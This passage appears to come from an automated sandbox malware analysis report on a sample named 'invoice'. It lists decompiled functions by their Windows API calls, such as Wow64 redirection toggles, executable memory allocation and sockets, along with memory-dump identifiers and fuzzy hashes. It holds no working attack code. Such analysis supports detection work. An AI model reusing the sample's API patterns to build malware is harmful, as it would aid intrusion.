                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                        • String ID: @
                        • API String ID: 4150878124-2766056989
                        • Opcode ID: b3ec1fe394e96a048a2399c98eb4fa4661b38557376b115b8ad5aeaa7d698bfb
                        • Instruction ID: dd95edf4be84a5e27689b335d42ad9d74424b5f1c069b2b60b9d9b4a4c61c04a
                        • Opcode Fuzzy Hash: b3ec1fe394e96a048a2399c98eb4fa4661b38557376b115b8ad5aeaa7d698bfb
                        • Instruction Fuzzy Hash: 94417E76900218BFDB10DFA5CC81EDEBBB9EB49710F00419AF955B7180CA756E85DB60
                        APIs
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0100F910,00000000,?,?,?,?), ref: 01007A11
                        • GetWindowLongW.USER32 ref: 01007A2E
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01007A3E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$Long
                        • String ID: SysTreeView32
                        • API String ID: 847901565-1698111956
                        • Opcode ID: 50100c2fcb932de2e6cb36b234585f58b598445bba44d17e9339a6ceb4960dd8
                        • Instruction ID: 998adac533e77165fbe42b8c49ba946d53360f7b40fcf90345f704f1cb53c19a
                        • Opcode Fuzzy Hash: 50100c2fcb932de2e6cb36b234585f58b598445bba44d17e9339a6ceb4960dd8
                        • Instruction Fuzzy Hash: E431D271200606ABEB629F38CC41BE67BA9FB49334F204725F9F5921D0C739F9909760
                        APIs
                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 01007493
                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 010074A7
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 010074CB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$Window
                        • String ID: SysMonthCal32
                        • API String ID: 2326795674-1439706946
                        • Opcode ID: 2857163c84725010b827c2257c5bf8484c9dc9bda14efa963fb23c4bb7142d44
                        • Instruction ID: 911f7ee03a2e94a4cbc0fdc3a24b253491b3a5085b01a2f9769f80df32b8724a
                        • Opcode Fuzzy Hash: 2857163c84725010b827c2257c5bf8484c9dc9bda14efa963fb23c4bb7142d44
                        • Instruction Fuzzy Hash: CD21B432500219ABEF228E94CC42FEA3BA9FF48724F110254FE946B1D1DB79B851DB90
                        APIs
                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 01007C7C
                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 01007C8A
                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01007C91
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$DestroyWindow
                        • String ID: msctls_updown32
                        • API String ID: 4014797782-2298589950
                        • Opcode ID: 13bec47cb1080df4666a16a8b7602076656a6c21aed6331e9621452a6350edf5
                        • Instruction ID: 7f120032376b757af24ca60214efa127cc6126e3fd8fa8229ac66afa49ecaa1d
                        • Opcode Fuzzy Hash: 13bec47cb1080df4666a16a8b7602076656a6c21aed6331e9621452a6350edf5
                        • Instruction Fuzzy Hash: 23217CB5600209AFEB52DF28DCC1DA737EDEB49354F04045DFA809B291DA35EC419BA0
                        APIs
                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01006D6D
                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01006D7D
                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01006DA2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$MoveWindow
                        • String ID: Listbox
                        • API String ID: 3315199576-2633736733
                        • Opcode ID: 4cee5f97c3d3250380a5d56d1bd4c35fca118e10a4af0bde180cdbec733e4f3e
                        • Instruction ID: 418ed4c687f9f20dc0a1e4796cade53e98cc7dc691a7290f01c3cf2504b7376d
                        • Opcode Fuzzy Hash: 4cee5f97c3d3250380a5d56d1bd4c35fca118e10a4af0bde180cdbec733e4f3e
                        • Instruction Fuzzy Hash: 8621F832610118BFEF239F58DC44FBB37AAEF89754F008125F9449B1D0C6729C6197A0
                        APIs
                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 010077A4
                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 010077B9
                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 010077C6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: msctls_trackbar32
                        • API String ID: 3850602802-1010561917
                        • Opcode ID: b90b060f0d8e38cd859da097757f6b178c95339b36d37d015acd9a020a847026
                        • Instruction ID: d224d8d76a60d689f27e06dd9e447c25b2bd8b39ff8fac8a8c62b99cb1c5fe8b
                        • Opcode Fuzzy Hash: b90b060f0d8e38cd859da097757f6b178c95339b36d37d015acd9a020a847026
                        • Instruction Fuzzy Hash: FA11E772240208BBEF265F74CC45FEB7BADFF88754F010218F685960D0D676A411DB20
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00F84C2E), ref: 00F84CA3
                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F84CB5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetNativeSystemInfo$kernel32.dll
                        • API String ID: 2574300362-192647395
                        • Opcode ID: 2b6fc6d53e0668518204696c74174e1ac9bb8e23f4faed0b3aa323dfc49e5ba4
                        • Instruction ID: af5e986449b2f6826fa7e2cd02dd0346c59e96f3f26550c891c34e35ff91b70f
                        • Opcode Fuzzy Hash: 2b6fc6d53e0668518204696c74174e1ac9bb8e23f4faed0b3aa323dfc49e5ba4
                        • Instruction Fuzzy Hash: D9D01230911723CFD731AF31D91868676D9AF06751F11882D98C5D6540D678D880EB50
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00F84CE1,?), ref: 00F84DA2
                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F84DB4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                        • API String ID: 2574300362-1355242751
                        • Opcode ID: 5a6653c7dd844d66aaa4d7c068a2ffbb228a33ac7cb65767fdb5b8a1ef9de0b0
                        • Instruction ID: 2333fff8a34fd2c3e65e9d868ebf83522abee2c1605ff0b9651259fcff767bf3
                        • Opcode Fuzzy Hash: 5a6653c7dd844d66aaa4d7c068a2ffbb228a33ac7cb65767fdb5b8a1ef9de0b0
                        • Instruction Fuzzy Hash: 45D01772950713CFD731AF32D818A8676E8AF06365F11882ED8C6DA550E7B4E880EB50
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00F84D2E,?,00F84F4F,?,010452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F84D6F
                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F84D81
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                        • API String ID: 2574300362-3689287502
                        • Opcode ID: 001d4ba9c3b34ee6672bb280b657cb8df0a4597a418c14b3d8a51a861bdcc447
                        • Instruction ID: 2e12633df9c4733c73756469e0da85b22c96781ed160d22f70bfbb8d358d6419
                        • Opcode Fuzzy Hash: 001d4ba9c3b34ee6672bb280b657cb8df0a4597a418c14b3d8a51a861bdcc447
                        • Instruction Fuzzy Hash: 22D01231A10713CFD7319F31D81869676D8BF15351F118C2D98C6D6250E675E880DB51
                        APIs
                        • LoadLibraryA.KERNEL32(advapi32.dll,?,010010C1), ref: 01000E80
                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01000E92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: RegDeleteKeyExW$advapi32.dll
                        • API String ID: 2574300362-4033151799
                        • Opcode ID: f04669060e76aae3bb6db0da44a96fe9f2f1435c871717b5a347bd697ed8481f
                        • Instruction ID: 07d8c6ce4a6077025e832e793d345163fdbfc9022f6415eb4a1c7b3e3484059e
                        • Opcode Fuzzy Hash: f04669060e76aae3bb6db0da44a96fe9f2f1435c871717b5a347bd697ed8481f
                        • Instruction Fuzzy Hash: A6D01770510723CFE7329F3AD91868676E8AF45396F118C6EA5CAE6184E7B4C8C0CB50
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00FF8E09,?,0100F910), ref: 00FF9203
                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00FF9215
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetModuleHandleExW$kernel32.dll
                        • API String ID: 2574300362-199464113
                        • Opcode ID: 2244f8d0d90e4d0659605c4e633ac74c3f5e1a299e2e001b352ec5e66f840b5f
                        • Instruction ID: a71513541ce4c7082db76c7a1a4ed82709246a299ad62defee326cdb8f74c48f
                        • Opcode Fuzzy Hash: 2244f8d0d90e4d0659605c4e633ac74c3f5e1a299e2e001b352ec5e66f840b5f
                        • Instruction Fuzzy Hash: C3D0C730958717DFDB328F32C80824272E9AF06361F00C82EA9C2CA160E6B4C8C0EB50
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: LocalTime__swprintf
                        • String ID: %.3d$WIN_XPe
                        • API String ID: 2070861257-2409531811
                        • Opcode ID: e5441cf45ece7f4500a5aad8e987ab3be27a225f2ab4a2b772a2bd225a791350
                        • Instruction ID: 701a50af6fb58715796785aa2ac913cfcc6d8923536120d53869fee01dcf97cd
                        • Opcode Fuzzy Hash: e5441cf45ece7f4500a5aad8e987ab3be27a225f2ab4a2b772a2bd225a791350
                        • Instruction Fuzzy Hash: 54D0127380511AEBCB14E6918986FFE737CFB0A300F14405AF442E1041E27D8BA4FB21
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f5888fae161206850356afb1822751d82fbb3033db3403a0b8aee3195f8ff796
                        • Instruction ID: 3b826e1997ad58b5bbf4aa21e0231a9d4c5e1e4acd8b8cf35a4f9fdef33b6934
                        • Opcode Fuzzy Hash: f5888fae161206850356afb1822751d82fbb3033db3403a0b8aee3195f8ff796
                        • Instruction Fuzzy Hash: 08C15B75A04216EFCB14DF98C884AAEB7B6FF48710B194599E805EF350E731ED81EB90
                        APIs
                        • CharLowerBuffW.USER32(?,?), ref: 00FFE1D2
                        • CharLowerBuffW.USER32(?,?), ref: 00FFE215
                          • Part of subcall function 00FFD8B9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00FFD8D9
                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00FFE415
                        • _memmove.LIBCMT ref: 00FFE428
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: BuffCharLower$AllocVirtual_memmove
                        • String ID:
                        • API String ID: 3659485706-0
                        • Opcode ID: d75d7e6c82293dca7da5aa95acb0ebbaf87d3d8e786cd7d945cd3be0c8295b9a
                        • Instruction ID: a0fe5a4a8e494c551b665e49e7e9422fc92b6981cd7419011ce37fd053a6e312
                        • Opcode Fuzzy Hash: d75d7e6c82293dca7da5aa95acb0ebbaf87d3d8e786cd7d945cd3be0c8295b9a
                        • Instruction Fuzzy Hash: 8FC18C71A083059FC704DF28C880A6ABBE4FF89724F14896DF999DB361D734E945DB82
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 00FF81D8
                        • CoUninitialize.OLE32 ref: 00FF81E3
                          • Part of subcall function 00FDD87B: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FDD8E3
                        • VariantInit.OLEAUT32(?), ref: 00FF81EE
                        • VariantClear.OLEAUT32(?), ref: 00FF84BF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                        • String ID:
                        • API String ID: 780911581-0
                        • Opcode ID: 8d2fc0beb63511b8e1656e6e3b99278421afe900a01d7c66ec6c485c6e00b24a
                        • Instruction ID: 595c004acc8f2157fcd2a1b490528a80086f6b82e72a218271793ebacb640a42
                        • Opcode Fuzzy Hash: 8d2fc0beb63511b8e1656e6e3b99278421afe900a01d7c66ec6c485c6e00b24a
                        • Instruction Fuzzy Hash: 81A15B756087059FCB10EF14C885B6AB7E5BF88364F08444CFA9A9B3A1CB78ED01EB41
                        APIs
                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01012C7C,?), ref: 00FD7A12
                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01012C7C,?), ref: 00FD7A2A
                        • CLSIDFromProgID.OLE32(?,?,00000000,0100FB80,000000FF,?,00000000,00000800,00000000,?,01012C7C,?), ref: 00FD7A4F
                        • _memcmp.LIBCMT ref: 00FD7A70
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: FromProg$FreeTask_memcmp
                        • String ID:
                        • API String ID: 314563124-0
                        • Opcode ID: 7fc73b703da0af9ec27ce12414a355ad930e98a684b13913d38efd6b46d67e56
                        • Instruction ID: a1c79b4f849e8260f823c52a85001ad911d24df4ed353b56d87ccb3fe0ea7d48
                        • Opcode Fuzzy Hash: 7fc73b703da0af9ec27ce12414a355ad930e98a684b13913d38efd6b46d67e56
                        • Instruction Fuzzy Hash: BD813B72A00209EFCB04DF94C884EEEB7BAFF89315F244199F505AB250DB35AE05DB61
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Variant$AllocClearCopyInitString
                        • String ID:
                        • API String ID: 2808897238-0
                        • Opcode ID: 8643b3724f28af7587e3dc832eba936ffbaba3bf0a694d48396c2ac404f531b0
                        • Instruction ID: d58c62e3d0f2d9cd65765c6a0e74ba2380c6ef1a6eaf495d568b0a95f20dea9e
                        • Opcode Fuzzy Hash: 8643b3724f28af7587e3dc832eba936ffbaba3bf0a694d48396c2ac404f531b0
                        • Instruction Fuzzy Hash: 92519131B043029BDB20AF65E895B69F3E7EF49310F28882FE596CB391DB749844B715
                        APIs
                        • GetWindowRect.USER32(0150DFB8,?), ref: 01009895
                        • ScreenToClient.USER32(00000002,00000002), ref: 010098C8
                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 01009935
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$ClientMoveRectScreen
                        • String ID:
                        • API String ID: 3880355969-0
                        • Opcode ID: 97b59d4e3a21558486af955a7cb66b87905fc9e48facdf5e8f2a780b25c97cf0
                        • Instruction ID: 550315d38ebdc39773b5873e688ecf6304bf9a1a6e7b84a99bbda46ab69fb60b
                        • Opcode Fuzzy Hash: 97b59d4e3a21558486af955a7cb66b87905fc9e48facdf5e8f2a780b25c97cf0
                        • Instruction Fuzzy Hash: B9515134900109EFEF22DF6CD9809AE7BF5FF44324F108199F9999B292D731A941CB90
                        APIs
                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00FF6AE7
                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF6AF7
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00FF6B5B
                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF6B67
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ErrorLast$__itow__swprintfsocket
                        • String ID:
                        • API String ID: 2214342067-0
                        • Opcode ID: c41617cb0d8f13c1c162c9ff6496a937c9a42824e207cb82934b6fe25bac945f
                        • Instruction ID: 5c7cb5e3600559b528856191ce86e4c3fd2655c50198e84b204aa94712e75f6e
                        • Opcode Fuzzy Hash: c41617cb0d8f13c1c162c9ff6496a937c9a42824e207cb82934b6fe25bac945f
                        • Instruction Fuzzy Hash: 0A41A335740200AFEB24BF64DC87F7A77E5AF44B10F448018FA59DB2D2DAB99D01A791
                        APIs
